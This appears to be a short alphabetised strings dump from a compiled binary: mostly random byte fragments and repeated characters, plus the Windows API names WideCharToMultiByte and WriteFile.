~WDHW=&4j
We2#TM3
WideCharToMultiByte
/%?WPG
@wpx^9
=w{:Qfw
WR]4L?L
WriteFile
wRojV^cP&,
&Ws]#:
wwjjrrrrr
wwwwww
wwwwwwAA            
WWWWWWWWW$$$$$$$$$$$$$$$$$
x4WYD4(
{	!*XBG'
x.e(OT
Xq	e3,
X^^^^^^U
{xVbo}
XXXXXX
xxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxx
xYVk$N
_YDHrw:
[y[LfOv
|YwwM#
ywZJ\{E
yyy)))))))))
>>YYYYY
yyyyyy
YYYYYY
YYYYYYY
YYYYYYYYYYYY444r```````
?zC|7t
:Z;mx7
)Z\o+y
Zthb,"
zzzzzzz
ZZZZZZZZ~~~~
ZZZZZZZZZZZZZZZZZ